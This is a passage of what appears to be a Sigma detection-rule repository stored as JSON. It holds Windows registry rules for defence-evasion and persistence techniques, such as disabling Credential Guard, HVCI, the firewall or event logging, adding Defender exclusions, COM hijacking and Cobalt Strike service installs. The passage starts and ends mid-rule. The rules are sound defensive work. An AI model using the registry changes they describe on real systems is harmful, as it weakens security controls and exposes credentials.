Browser Vpn\n            - oofgbpoabipfcfjapgnbbjjaenockbdp # SetupVPN\n            - bhnhkdgoefpmekcgnccpnhjfdgicfebm # Wachee VPN\n            - knmmpciebaoojcpjjoeonlcjacjopcpf # Thunder Proxy\n            - dhadilbmmjiooceioladdphemaliiobo # Free Proxy VPN\n            - jedieiamjmoflcknjdjhpieklepfglin # FastestVPN Proxy\n            - mhngpdlhojliikfknhfaglpnddniijfh # WorkingVPN\n            - omdakjcmkglenbhjadbccaookpfjihpa # TunnelBear VPN\n            - npgimkapccfidfkfoklhpkgmhgfejhbj # BelkaVPN\n            - akeehkgglkmpapdnanoochpfmeghfdln # VPN Master\n            - gbmdmipapolaohpinhblmcnpmmlgfgje # Unblock Websites\n            - aigmfoeogfnljhnofglledbhhfegannp # Lethean Proxy VPN\n            - cgojmfochfikphincbhokimmmjenhhgk # Whoer VPN\n            - ficajfeojakddincjafebjmfiefcmanc # Best VPN USA\n            - ifnaibldjfdmaipaddffmgcmekjhiloa # FREE VPN DEWELOPMENT\n            - jbnmpdkcfkochpanomnkhnafobppmccn # apkfold free vpn\n            - apcfdffemoinopelidncddjbhkiblecc # Soul VPN\n            - mjolnodfokkkaichkcjipfgblbfgojpa # DotVPN\n            - oifjbnnafapeiknapihcmpeodaeblbkn # rderzh VPN Proxy\n            - plpmggfglncceinmilojdkiijhmajkjh # Red Panda VPN\n            - mjnbclmflcpookeapghfhapeffmpodij # Ultrareach VPN\n            - bblcccknbdbplgmdjnnikffefhdlobhp # FastStunnel VPN\n            - aojlhgbkmkahabcmcpifbolnoichfeep # VirtualShield VPN\n            - lcmammnjlbmlbcaniggmlejfjpjagiia # Adblock Office VPN Proxy Server\n            - knajdeaocbpmfghhmijicidfcmdgbdpm # Guru VPN & Proxy\n            - bdlcnpceagnkjnjlbbbcepohejbheilk # Malus VPN\n            - edknjdjielmpdlnllkdmaghlbpnmjmgb # Muscle VPN\n            - eidnihaadmmancegllknfbliaijfmkgo # Push VPN\n            - ckiahbcmlmkpfiijecbpflfahoimklke # Gom VPN\n            - macdlemfnignjhclfcfichcdhiomgjjb # Free Fast VPN\n            - chioafkonnhbpajpengbalkececleldf # BullVPN\n            - amnoibeflfphhplmckdbiajkjaoomgnj # HideAll VPN\n            
- llbhddikeonkpbhpncnhialfbpnilcnc # ProxyFlow\n            - pcienlhnoficegnepejpfiklggkioccm # Cloud VPN\n            - iocnglnmfkgfedpcemdflhkchokkfeii # sVPN\n            - igahhbkcppaollcjeaaoapkijbnphfhb # Social VPN\n            - njpmifchgidinihmijhcfpbdmglecdlb # Trellonet Trellonet\n            - ggackgngljinccllcmbgnpgpllcjepgc # WindmillVPN\n            - kchocjcihdgkoplngjemhpplmmloanja # IPBurger Proxy & VPN\n            - bnijmipndnicefcdbhgcjoognndbgkep # Veee\n            - lklekjodgannjcccdlbicoamibgbdnmi # Anonymous Proxy Vpn Browser\n            - dbdbnchagbkhknegmhgikkleoogjcfge # Hideman VPN\n            - egblhcjfjmbjajhjhpmnlekffgaemgfh # Fornex VPN\n            - ehbhfpfdkmhcpaehaooegfdflljcnfec # WeVPN\n            - bkkgdjpomdnfemhhkalfkogckjdkcjkg # VPNMatic\n            - almalgbpmcfpdaopimbdchdliminoign # Urban Shield\n            - akkbkhnikoeojlhiiomohpdnkhbkhieh # Prime VPN\n            - gbfgfbopcfokdpkdigfmoeaajfmpkbnh # westwind\n            - bniikohfmajhdcffljgfeiklcbgffppl # Upnet\n            - lejgfmmlngaigdmmikblappdafcmkndb # uVPN\n            - ffhhkmlgedgcliajaedapkdfigdobcif # Nucleus VPN\n            - gcknhkkoolaabfmlnjonogaaifnjlfnp # FoxyProxy Standard\n            - pooljnboifbodgifngpppfklhifechoe # GeoProxy\n            - fjoaledfpmneenckfbpdfhkmimnjocfa # NordVPN\n            - aakchaleigkohafkfjfjbblobjifikek # ProxFlow\n            - dpplabbmogkhghncfbfdeeokoefdjegm # Proxy SwitchySharp\n            - padekgcemlokbadohgkifijomclgjgif # Proxy SwitchyOmega\n            - bfidboloedlamgdmenmlbipfnccokknp # PureVPN\n    condition: all of chrome_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_clickonce_trust_prompt.yml",
    "content": "title: ClickOnce Trust Prompt Tampering\nid: ac9159cc-c364-4304-8f0a-d63fc1a0aabb\nstatus: test\ndescription: Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet.\nreferences:\n    - https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5\n    - https://learn.microsoft.com/en-us/visualstudio/deployment/how-to-configure-the-clickonce-trust-prompt-behavior\nauthor: '@SerkinValery, Nasreddine Bencherchali (Nextron Systems)'\ndate: 2023-06-12\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\MICROSOFT\\.NETFramework\\Security\\TrustManager\\PromptingLevel\\'\n        TargetObject|endswith:\n            - '\\Internet'\n            - '\\LocalIntranet'\n            - '\\MyComputer'\n            - '\\TrustedSites'\n            - '\\UntrustedSites'\n        Details: 'Enabled'\n    condition: selection\nfalsepositives:\n    - Legitimate internal requirements.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_cobaltstrike_service_installs.yml",
    "content": "title: Potential CobaltStrike Service Installations - Registry\nid: 61a7697c-cb79-42a8-a2ff-5f0cdfae0130\nstatus: test\ndescription: |\n    Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or performs lateral movement.\nreferences:\n    - https://www.sans.org/webcasts/tech-tuesday-workshop-cobalt-strike-detection-log-analysis-119395\nauthor: Wojciech Lesicki\ndate: 2021-06-29\nmodified: 2024-03-25\ntags:\n    - attack.persistence\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.lateral-movement\n    - attack.t1021.002\n    - attack.t1543.003\n    - attack.t1569.002\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_key:\n        - TargetObject|contains: '\\System\\CurrentControlSet\\Services'\n        - TargetObject|contains|all:\n              - '\\System\\ControlSet'\n              - '\\Services'\n    selection_details:\n        - Details|contains|all:\n              - 'ADMIN$'\n              - '.exe'\n        - Details|contains|all:\n              - '%COMSPEC%'\n              - 'start'\n              - 'powershell'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_comhijack_sdclt.yml",
    "content": "title: COM Hijack via Sdclt\nid: 07743f65-7ec9-404a-a519-913db7118a8d\nstatus: test\ndescription: Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'\nreferences:\n    - http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass\n    - https://www.exploit-db.com/exploits/47696\nauthor: Omkar Gudhate\ndate: 2020-09-27\nmodified: 2023-09-28\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1546\n    - attack.t1548\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_crashdump_disabled.yml",
    "content": "title: CrashControl CrashDump Disabled\nid: 2ff692c2-4594-41ec-8fcb-46587de769e0\nstatus: test\ndescription: Detects disabling the CrashDump per registry (as used by HermeticWiper)\nreferences:\n    - https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/\nauthor: Tobias Michalski (Nextron Systems)\ndate: 2022-02-24\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1564\n    - attack.t1112\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains: 'SYSTEM\\CurrentControlSet\\Control\\CrashControl'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Legitimate disabling of crashdumps\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_create_minint_key.yml",
    "content": "title: Security Event Logging Disabled via MiniNt Registry Key - Registry Set\nid: 8839e550-52d7-4958-9f2f-e13c1e736838\nrelated:\n    - id: 1a4bd6af-99ac-4466-b5b2-7b72b4a05462 # Security Event Logging Disabled Via MiniNt Registry Key\n      type: similar\nstatus: experimental\ndescription: |\n    Detects the addition of the 'MiniNt' key to the registry. Upon a reboot, the Windows Event Log service will stop writing events.\n    Windows Event Log is a service that collects and stores event logs from the operating system and applications. It is an important component of Windows security and auditing.\n    Adversaries may want to disable this service to suppress logging of security events that could be used to detect their activities.\nreferences:\n    - https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-04-09\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1562.002\n    - attack.t1112\n    - car.2022-03-001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject: 'HKLM\\System\\CurrentControlSet\\Control\\MiniNt\\(Default)'\n    condition: selection\nfalsepositives:\n    - Highly Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_creation_service_susp_folder.yml",
    "content": "title: Service Binary in Suspicious Folder\nid: a07f0359-4c90-4dc4-a681-8ffea40b4f47\nrelated:\n    - id: c0abc838-36b0-47c9-b3b3-a90c39455382\n      type: obsolete\nstatus: test\ndescription: Detects the creation of a service with a service binary located in a suspicious directory\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\nauthor: Florian Roth (Nextron Systems), frack113\ndate: 2022-05-02\nmodified: 2025-10-07\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_service_start:\n        TargetObject|startswith: 'HKLM\\System\\CurrentControlSet\\Services\\'\n        TargetObject|endswith: '\\Start'\n        Image|contains:\n            - '\\Users\\Public\\'\n            - '\\Perflogs\\'\n            - '\\ADMIN$\\'\n            - '\\Temp\\'\n        Details:\n            - 'DWORD (0x00000000)'  # boot\n            - 'DWORD (0x00000001)'  # System\n            - 'DWORD (0x00000002)'  # Automatic\n            # 3 - Manual , 4 - Disabled\n    selection_service_imagepath:\n        TargetObject|startswith: 'HKLM\\System\\CurrentControlSet\\Services\\'\n        TargetObject|endswith: '\\ImagePath'\n        Details|contains:\n            - '\\Users\\Public\\'\n            - '\\Perflogs\\'\n            - '\\ADMIN$\\'\n            - '\\Temp\\'\n    filter_optional_avast:\n        Image|contains|all: # Filter FP with Avast software\n            - '\\Common Files\\'\n            - '\\Temp\\'\n    filter_optional_mbamservice:\n        TargetObject|endswith: '\\CurrentControlSet\\Services\\MBAMInstallerService\\ImagePath'\n        Details|endswith: '\\AppData\\Local\\Temp\\MBAMInstallerService.exe\"'\n        Image: 'C:\\Windows\\system32\\services.exe'\n    condition: 1 of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_credential_guard_disabled.yml",
    "content": "title: Windows Credential Guard Disabled - Registry\nid: 73921b9c-cafd-4446-b0c6-fdb0ace42bc0\nrelated:\n    - id: c17d47b7-dcd6-4109-87eb-d1817bd4cbc9\n      type: similar\nstatus: experimental\ndescription: |\n    Detects attempts to disable Windows Credential Guard by setting registry values to 0. Credential Guard uses virtualization-based security to isolate secrets so that only privileged system software can access them.\n    Adversaries may disable Credential Guard to gain access to sensitive credentials stored in the system, such as NTLM hashes and Kerberos tickets, which can be used for lateral movement and privilege escalation.\nreferences:\n    - https://woshub.com/disable-credential-guard-windows/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-12-26\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith:\n            - '\\DeviceGuard\\EnableVirtualizationBasedSecurity'\n            - '\\DeviceGuard\\LsaCfgFlags'\n            - '\\Lsa\\LsaCfgFlags'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_credential_guard_disabled/info.yml\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_custom_file_open_handler_powershell_execution.yml",
    "content": "title: Custom File Open Handler Executes PowerShell\nid: 7530b96f-ad8e-431d-a04d-ac85cc461fdc\nstatus: test\ndescription: Detects the abuse of a custom file open handler to execute PowerShell\nreferences:\n    - https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/?cmp=30728\nauthor: CD_R0M_\ndate: 2022-06-11\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: 'shell\\open\\command\\'\n        Details|contains|all:\n            - 'powershell'\n            - '-command'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml",
    "content": "title: Potential Registry Persistence Attempt Via DbgManagedDebugger\nid: 9827ae57-3802-418f-994b-d5ecf5cd974b\nstatus: test\ndescription: Detects the addition of the \"Debugger\" value to the \"DbgManagedDebugger\" key in order to achieve persistence. The configured debugger gets invoked when an application crashes\nreferences:\n    - https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/\n    - https://github.com/last-byte/PersistenceSniper\nauthor: frack113\ndate: 2022-08-07\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1574\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Microsoft\\.NETFramework\\DbgManagedDebugger'\n    filter:\n        Details: '\"C:\\Windows\\system32\\vsjitdebugger.exe\" PID %d APPDOM %d EXTEXT \"%s\" EVTHDL %d'\n    condition: selection and not filter\nfalsepositives:\n    - Legitimate use of the key to set up a debugger, which is often the case on developer machines\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_defender_exclusions.yml",
    "content": "title: Windows Defender Exclusions Added - Registry\nid: a982fc9c-6333-4ffb-a51d-addb04e8b529\nrelated:\n    - id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f\n      type: derived\nstatus: test\ndescription: Detects the Setting of Windows Defender Exclusions\nreferences:\n    - https://twitter.com/_nullbind/status/1204923340810543109\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-07-06\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection2:\n        TargetObject|contains: '\\Microsoft\\Windows Defender\\Exclusions'\n    condition: selection2\nfalsepositives:\n    - Administrator actions\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_desktop_background_change.yml",
    "content": "title: Potentially Suspicious Desktop Background Change Via Registry\nid: 85b88e05-dadc-430b-8a9e-53ff1cd30aae\nrelated:\n    - id: 8cbc9475-8d05-4e27-9c32-df960716c701\n      type: similar\nstatus: test\ndescription: |\n    Detects registry value settings that would replace the user's desktop background.\n    This is a common technique used by malware to change the desktop background to a ransom note or other image.\nreferences:\n    - https://www.attackiq.com/2023/09/20/emulating-rhysida/\n    - https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/\n    - https://www.trendmicro.com/en_us/research/23/h/an-overview-of-the-new-rhysida-ransomware.html\n    - https://www.virustotal.com/gui/file/a864282fea5a536510ae86c77ce46f7827687783628e4f2ceb5bf2c41b8cd3c6/behavior\n    - https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.WindowsDesktop::Wallpaper\n    - https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.ControlPanelDisplay::CPL_Personalization_NoDesktopBackgroundUI\nauthor: Nasreddine Bencherchali (Nextron Systems), Stephen Lincoln @slincoln-aiq (AttackIQ)\ndate: 2023-12-21\nmodified: 2025-10-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.impact\n    - attack.t1112\n    - attack.t1491.001\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection_keys:\n        TargetObject|contains:\n            - 'Control Panel\\Desktop'\n            - 'CurrentVersion\\Policies\\ActiveDesktop'\n            - 'CurrentVersion\\Policies\\System'\n    selection_values_1:\n        TargetObject|endswith: 'NoChangingWallpaper'\n        Details: 'DWORD (0x00000001)' # Prevent changing desktop background\n    selection_values_2:\n        TargetObject|endswith: '\\Wallpaper'\n    selection_values_3:\n        TargetObject|endswith: '\\WallpaperStyle'\n        Details: '2' # Stretch\n    filter_main_svchost:\n        # Note: Excluding GPO changes\n        Image|endswith: '\\svchost.exe'\n    filter_main_empty:\n        TargetObject|endswith: '\\Control Panel\\Desktop\\Wallpaper'\n        Details: '(Empty)'\n    filter_main_explorer:\n        # Normally Explorer.exe is the process that changes the desktop background\n        Image|endswith: 'C:\\Windows\\Explorer.EXE'\n    filter_optional_ec2launch:\n        Image:\n            - 'C:\\Program Files\\Amazon\\EC2Launch\\EC2Launch.exe'\n            - 'C:\\Program Files (x86)\\Amazon\\EC2Launch\\EC2Launch.exe'\n        TargetObject|endswith: '\\Control Panel\\Desktop\\Wallpaper'\n    condition: selection_keys and 1 of selection_values_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Administrative scripts that change the desktop background to a company logo or other image.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_devdrv_disallow_antivirus_filter.yml",
    "content": "title: Antivirus Filter Driver Disallowed On Dev Drive - Registry\nid: 31e124fb-5dc4-42a0-83b3-44a69c77b271\nstatus: test\ndescription: |\n    Detects activity that indicates a user disabling the ability for Antivirus mini filter to inspect a \"Dev Drive\".\nreferences:\n    - https://twitter.com/0gtweet/status/1720419490519752955\nauthor: '@kostastsale, Nasreddine Bencherchali (Nextron Systems)'\ndate: 2023-11-05\nmodified: 2024-08-16\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\FilterManager\\FltmgrDevDriveAllowAntivirusFilter'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml",
    "content": "title: Windows Hypervisor Enforced Code Integrity Disabled\nid: 8b7273a4-ba5d-4d8a-b04f-11f2900d043a\nrelated:\n    - id: 6225c53a-a96e-4235-b28f-8d7997cd96eb\n      type: similar\nstatus: test\ndescription: |\n    Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the \"Enabled\" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel\nreferences:\n    - https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/\n    - https://github.com/redcanaryco/atomic-red-team/blob/04e487c1828d76df3e834621f4f893ea756d5232/atomics/T1562.001/T1562.001.md#atomic-test-43---disable-hypervisor-enforced-code-integrity-hvci\nauthor: Nasreddine Bencherchali (Nextron Systems), Anish Bogati\ndate: 2023-03-14\nmodified: 2024-07-05\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith:\n            - '\\Control\\DeviceGuard\\HypervisorEnforcedCodeIntegrity'\n            - '\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity\\Enabled'\n            - '\\Microsoft\\Windows\\DeviceGuard\\HypervisorEnforcedCodeIntegrity'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Legitimate system administration tasks that require disabling HVCI for troubleshooting purposes when certain drivers or applications are incompatible with it.\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Disable Hypervisor-Enforced Code Integrity (HVCI)\n      technique: T1562.001\n      atomic_guid: 70bd71e6-eba4-4e00-92f7-617911dbe020\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedpagingtranslation_disabled.yml",
    "content": "title: Hypervisor Enforced Paging Translation Disabled\nid: 7f2954d2-99c2-4d42-a065-ca36740f187b\nstatus: test\ndescription: |\n    Detects changes to the \"DisableHypervisorEnforcedPagingTranslation\" registry value, where it is set to \"1\" in order to disable the Hypervisor Enforced Paging Translation feature.\nreferences:\n    - https://twitter.com/standa_t/status/1808868985678803222\n    - https://github.com/AaLl86/WindowsInternals/blob/070dc4f317726dfb6ffd2b7a7c121a33a8659b5e/Slides/Hypervisor-enforced%20Paging%20Translation%20-%20The%20end%20of%20non%20data-driven%20Kernel%20Exploits%20(Recon2024).pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-07-05\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\DisableHypervisorEnforcedPagingTranslation'\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_dhcp_calloutdll.yml",
    "content": "title: DHCP Callout DLL Installation\nid: 9d3436ef-9476-4c43-acca-90ce06bdf33a\nstatus: test\ndescription: Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)\nreferences:\n    - https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html\n    - https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx\n    - https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx\nauthor: Dimitrios Slamaris\ndate: 2017-05-15\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith:\n            - '\\Services\\DHCPServer\\Parameters\\CalloutDlls'\n            - '\\Services\\DHCPServer\\Parameters\\CalloutEnabled'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disable_administrative_share.yml",
    "content": "title: Disable Administrative Share Creation at Startup\nid: c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e\nstatus: test\ndescription: Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md#atomic-test-4---disable-administrative-share-creation-at-startup\nauthor: frack113\ndate: 2022-01-16\nmodified: 2024-03-25\ntags:\n    - attack.defense-evasion\n    - attack.t1070.005\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Services\\LanmanServer\\Parameters\\'\n        TargetObject|endswith:\n            - '\\AutoShareWks'\n            - '\\AutoShareServer'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_disable_administrative_share/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Disable Administrative Share Creation at Startup\n      technique: T1070.005\n      atomic_guid: 99c657aa-ebeb-4179-a665-69288fdd12b8\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml",
    "content": "title: Potential AutoLogger Sessions Tampering\nid: f37b4bce-49d0-4087-9f5b-58bffda77316\nstatus: test\ndescription: Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging\nreferences:\n    - https://twitter.com/MichalKoczwara/status/1553634816016498688\n    - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\n    - https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-01\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_main:\n        TargetObject|contains: '\\System\\CurrentControlSet\\Control\\WMI\\Autologger\\'\n    selection_values:\n        TargetObject|contains: # We only care about some autologger to avoid FP. Add more if you need\n            - '\\EventLog-'\n            - '\\Defender'\n        TargetObject|endswith:\n            - '\\Enable'\n            - '\\Start'\n        Details: DWORD (0x00000000)\n    filter_main_wevtutil:\n        Image: 'C:\\Windows\\system32\\wevtutil.exe'\n    filter_main_defender:\n        Image|startswith:\n            - 'C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n            - 'C:\\Program Files\\Windows Defender\\'\n            - 'C:\\Program Files (x86)\\Windows Defender\\'\n        Image|endswith: '\\MsMpEng.exe'\n        TargetObject|contains:\n            - '\\DefenderApiLogger\\'\n            - '\\DefenderAuditLogger\\'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disable_defender_firewall.yml",
    "content": "title: Disable Microsoft Defender Firewall via Registry\nid: 974515da-6cc5-4c95-ae65-f97f9150ec7f\nstatus: test\ndescription: Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry\nauthor: frack113\ndate: 2022-01-09\nmodified: 2024-03-25\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        # HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\DomainProfile\\EnableFirewall\n        # HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\PublicProfile\\EnableFirewall\n        # HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\EnableFirewall\n        TargetObject|contains: '\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\'\n        TargetObject|endswith: '\\EnableFirewall'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_disable_defender_firewall/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Disable Microsoft Defender Firewall via Registry\n      technique: T1562.004\n      atomic_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disable_function_user.yml",
    "content": "title: Disable Internal Tools or Feature in Registry\nid: e2482f8d-3443-4237-b906-cc145d87a076\nstatus: test\ndescription: Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md\n    - https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions\n    - https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html\n    - https://www.malwarebytes.com/blog/detections/pum-optional-nodispbackgroundpage\n    - https://www.malwarebytes.com/blog/detections/pum-optional-nodispcpl\n    - https://bazaar.abuse.ch/sample/7bde840c7e8c36dce4c3bac937bcf39f36a6f118001b406bfbbc25451ce44fb4/\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems), CrimpSec\ndate: 2022-03-18\nmodified: 2025-06-04\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_set_1:\n        TargetObject|endswith:\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisableCMD'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoControlPanel'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\StartMenuLogOff'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableChangePassword'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableLockWorkstation'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskmgr'\n          